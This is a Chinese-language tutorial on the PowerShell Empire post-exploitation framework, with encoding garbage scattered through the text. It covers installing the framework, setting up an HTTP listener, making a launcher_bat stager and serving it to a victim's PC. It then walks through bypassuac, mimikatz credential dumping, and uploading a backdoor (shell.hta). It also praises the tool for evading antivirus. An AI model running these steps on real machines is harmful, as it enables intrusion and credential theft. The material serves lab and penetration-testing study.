0x01 簡(jiǎn)介
Empire是一個(gè)后滲透攻擊框架���。它是一個(gè)純粹的PowerShell代理,具有加密安全通信和靈活架構(gòu)的附加功能��。Empire具有在不需要PowerShell.exe的情況下執(zhí)行PowerShell代理的方法�����。它可以迅速采用可后期利用的模塊�,涵蓋范圍廣泛,從鍵盤記錄器到mimikatz等����。這個(gè)框架是PowerShell
Empire和Python Empire項(xiàng)目的組合; 這使得它用戶友好和方便。PowerShell Empire于2015年問(wèn)世��,Python
Empire于2016年問(wèn)世。它類似于Metasploit和Meterpreter���。但由于它是命令和控制工具,它允許您更有效地控制PC��。 ?
PowerShell提供了豐富的攻擊性優(yōu)勢(shì)�,進(jìn)一步包括.NET的全部訪問(wèn),applock白名單以及對(duì)Win32的直接訪問(wèn)�����。它還在內(nèi)存中構(gòu)建惡意二進(jìn)制文件���。它提供C2功能����,允許您在第一階段之后植入第二階段��。它也可以用于橫向移動(dòng)����。它與其他框架相比發(fā)展迅速,且非常方便��。此外�����,由于它不需要PowerShell.exe,它可以讓您繞過(guò)反病毒��。因此���,最好使用PowerShell
Empire�。 ? 0x02 功能 listenter:監(jiān)聽(tīng)器是一個(gè)從我們正在攻擊的機(jī)器上偵聽(tīng)連接的進(jìn)程��。這有助于Empire將戰(zhàn)利品發(fā)回攻擊者的計(jì)算機(jī)���。
Stager: stager是一段代碼����,允許我們的惡意代碼通過(guò)受感染主機(jī)上的代理運(yùn)行�。 proxy:代理是一種程序,用于維護(hù)計(jì)算機(jī)與受感染主機(jī)之間的連接��。
module:執(zhí)行我們的惡意命令��,這些命令可以收集憑據(jù)并升級(jí)我們的權(quán)限���。 ? 0x03 安裝 使用以下命令下載它: git clone
https://github.com/EmpireProject/Empire.git
<https://github.com/EmpireProject/Empire.git> 下載完成并完成后��,請(qǐng)按照下面給出的步驟進(jìn)行安裝: cd
Empire/ cd setup/ ./install.sh 安裝完成后���,移回Empire目錄并使用./empire運(yùn)行empire ?
現(xiàn)在使用help命令����,因?yàn)樗蜷_(kāi)了最初所需的所有基本選項(xiàng)�����。 (Empire) > help ? Commands ======== agents Jump
to the Agents menu. # 跳轉(zhuǎn)到代理菜單 creds Add/display credentials to/from the
database. # 從數(shù)據(jù)庫(kù)中添加/顯示憑據(jù) exit Exit Empire help Displays the help menu. interact
Interact with a particular agent. # 與特定的代理交互 list Lists active agents or
listeners. # 列出活動(dòng)代理或偵聽(tīng)器 listeners Interact with active listeners. # 與活躍的會(huì)話互動(dòng)
load Loads Empire modules from a non-standard folder. # 從非標(biāo)準(zhǔn)文件夾加載Empire模塊
plugin Load a plugin file to extend Empire. # 加載插件文件以擴(kuò)展Empire plugins List all
available and active plugins. # 列出所有可用的和活動(dòng)的插件 preobfuscate Preobfuscate
PowerShell module_source files # 預(yù)混淆PowerShell模塊源文件 reload Reload one (or all)
Empire modules. # 重新加載一個(gè)或多個(gè)Empire模塊 report Produce report CSV and log files:
sessions.csv, credentials.csv, master.log # 生成CSV報(bào)告和日志文件 reset Reset a global
option (e.g. IP whitelists). # 重置一個(gè)全局的選項(xiàng) resource Read and execute a list of
Empire commands from a file. # 從文件中讀取并執(zhí)行Empire命令列表 searchmodule Search Empire
module names/descriptions. # 搜索帝國(guó)模塊名稱/描述 set Set a global option (e.g. IP
whitelists). # 設(shè)置全局選項(xiàng) show Show a global option (e.g. IP whitelists). # 顯示全局選項(xiàng)
usemodule Use an Empire module. # 使用一個(gè)Empire模塊 usestager Use an Empire stager.
# 使用一個(gè)Empire代碼段 ? 根據(jù)工作流程�,首先�,我們必須在本地機(jī)器上創(chuàng)建一個(gè)監(jiān)聽(tīng)器。 listeners 查看活動(dòng)的偵聽(tīng)器 ?
進(jìn)入監(jiān)聽(tīng)器界面輸入以下命令查看所有可用的偵聽(tīng)器 (Empire: listeners) > uselistener <tab> <tab> dbx
http_com http_hop meterpreter redirector http http_foreign http_mapi onedrive ?
最流行和最常用的偵聽(tīng)器是http uselistener http
此命令在本地端口80上創(chuàng)建一個(gè)偵聽(tīng)器��。如果端口80已經(jīng)被像Apache這樣的服務(wù)占用�,請(qǐng)確保停止該服務(wù),因?yàn)榇藗陕?tīng)器是http偵聽(tīng)器只能在端口80上工作�����。 ?
查看偵聽(tīng)器下可以使用的命令 (Empire: listeners) > <tab><tab> agents delete enable info list
resource back disable exit kill listeners uselistener creds edit help launcher
main usestager ? 如果要?jiǎng)h除一個(gè)活躍的listener�,使用kill命令 (Empire: listeners) > kill http
[!] Killing listener 'http' ? 現(xiàn)在要查看所有你應(yīng)該在這個(gè)監(jiān)聽(tīng)器類型中提供的選項(xiàng): info ?
正如上圖所示,你可以使用各種設(shè)置來(lái)修改或自定義偵聽(tīng)器。我們可以嘗試更改我們的監(jiān)聽(tīng)器的名稱�����,這樣有助于記住所有被激活的監(jiān)聽(tīng)器; set Name test
上面的命令會(huì)將偵聽(tīng)器的名稱從http更改為test��。 通常�����,此偵聽(tīng)器會(huì)自動(dòng)占用本地主機(jī)IP��,但為了以防萬(wàn)一�����,你可以使用以下命令設(shè)置IP: set Host
192.168.88.152 execute 上面的命令將執(zhí)行監(jiān)聽(tīng)器����。然后返回并使用PowerShell偵聽(tīng)器
現(xiàn)在輸入'back'以從監(jiān)聽(tīng)器接口返回,以便我們可以執(zhí)行我們的模塊���。使用以下命令查看Empire提供的所有模塊: (Empire:
listeners/http) > back (Empire: listeners) > usestager <tab> <tab>
正如圖中所示�,Windows和IOS都有很多模塊����,還有一些可以在任何平臺(tái)上使用的多模塊���。以下實(shí)驗(yàn),我們將使用launcher_bat創(chuàng)建惡意軟件并利用受害者的PC��。
usestager windows/launcher_bat ?
然后再次鍵入“info”以查看漏洞利用所需的所有設(shè)置���。經(jīng)過(guò)檢查�����,發(fā)現(xiàn)我們只需要提供listener。 set Listener test execute
在設(shè)置偵聽(tīng)器測(cè)試并創(chuàng)建/tmp/launcher.bat之后�����,上述兩個(gè)命令將執(zhí)行我們的漏洞利用���。使用python服務(wù)器在受害者的PC中執(zhí)行此文件���。
python -m SimpleHTTPServer 8080 ? 當(dāng)文件將執(zhí)行時(shí),您將有一個(gè)會(huì)話�����。要檢查您的會(huì)話類型: agents
使用上面的命令,您可以看到已激活會(huì)話����。您可以更改會(huì)話的名稱,因?yàn)槟J(rèn)情況下給出的名稱非常復(fù)雜且難以記住��。為此��,請(qǐng)鍵入: rename P4BNYW6D pc01
使用以下命令訪問(wèn)會(huì)話: interact pc01 獲得對(duì)會(huì)話的訪問(wèn)權(quán)限后����,請(qǐng)嘗試使用以下命令獲取管理會(huì)話: bypassuac http
執(zhí)行bypassuac命令后,將打開(kāi)另一個(gè)會(huì)話��。鍵入以下內(nèi)容重命名該會(huì)話: rename HE3K45LN admin01 interact with
admin01 now. interact admin01 <tab>
<tab>幫助我們查看shell中的所有選項(xiàng)����。有幾種選擇對(duì)后期開(kāi)發(fā)很有幫助。如信息�����,工作�,列表等����,如圖所示���。 信息:
所有基本細(xì)節(jié)�����,如IP���,隨機(jī)數(shù),抖動(dòng)�����,完整性等���。 現(xiàn)在,如果使用'help'命令���,您將能夠看到所有可執(zhí)行命令�。 讓我們嘗試運(yùn)行 mimikatz
來(lái)獲取用戶的密碼����。由于 mimikatz 不能在普通的guest用戶shell上運(yùn)行����,并且只能在admin shell上運(yùn)行;
這也證明我們必須實(shí)現(xiàn)管理員訪問(wèn)權(quán)限�����,以便我們可以使用mimikatz���。 Hmmmm�!用戶的密碼為“123456”�����。 creds
上面的命令也會(huì)在明文及其哈希中轉(zhuǎn)儲(chǔ)任何用戶的憑據(jù)或密碼���。 另一個(gè)重要的命令是 shell 命令����。 要使用受害者的shell運(yùn)行正確的Microsoft
Windows命令����,我們使用此功能�。 例如:一個(gè)這樣的窗口的cmd only命令是 netstat shell netstat -ano
正如預(yù)期的那樣�,上面的命令向我們展示了機(jī)器上當(dāng)前工作的所有端口! 現(xiàn)在�,因?yàn)閣indows中的默認(rèn)shell目錄是“ C:/ windows /
system32 ”; 讓我們嘗試移動(dòng)到另一個(gè)目錄并嘗試從那里下載一些文件,我們也可以在該位置上傳一些內(nèi)容����,例如,我們可以上傳后門�����!現(xiàn)在����,使用以下命令:
shell cd C:\Users\lihui03\Desktop shell dir download msf.pdf ?
上面的命令將從窗口的桌面下載一個(gè)名為msf.pdf的圖像到“帝國(guó)的下載目錄”
在這里我們可以上傳任何后門,在上面的命令的幫助下���,我們從Kali的桌面上傳一個(gè)后門到受害者的桌面,我們甚至可以調(diào)用這個(gè)文件�,因?yàn)槲覀冇衧hell訪問(wèn)權(quán)限!
upload /root/shell.hta 這是下載文件的位置: 查看上傳的文件 上面的命令證明我們確實(shí)已經(jīng)上傳了shell.hta
之前展示的是基本演示及其使用的不同術(shù)語(yǔ)以及如何使用它們�。還有另一個(gè)術(shù)語(yǔ),即usemodule���。最后�,讓我們看看如何使用它。
該命令將顯示所有可用模塊并可供使用�����,如下圖所示: 以下是如何使用usemodule的小型演示�����。類型: usemodule trollsploit/message
set MsgText you have been hacked execute y 使用上述模塊將在受害者的PC上顯示一條消息��,如下圖所示:
目標(biāo)機(jī)器上是這樣的?�。�����?����! 結(jié)論 惡意軟件以.exe / dll /
hta等形式允許攻擊者構(gòu)建任何理想的攻擊�,因?yàn)榇丝蚣芸梢栽L問(wèn)Win32。雖然反病毒公司日益知曉,但這些公司仍然有效����。由于其廣泛,真實(shí)和有效的后漏洞收集��,它是一個(gè)偉大的工具�。最終,目標(biāo)是在攻擊中未被發(fā)現(xiàn)并成功�����,這個(gè)工具允許我們這樣做�����。
?
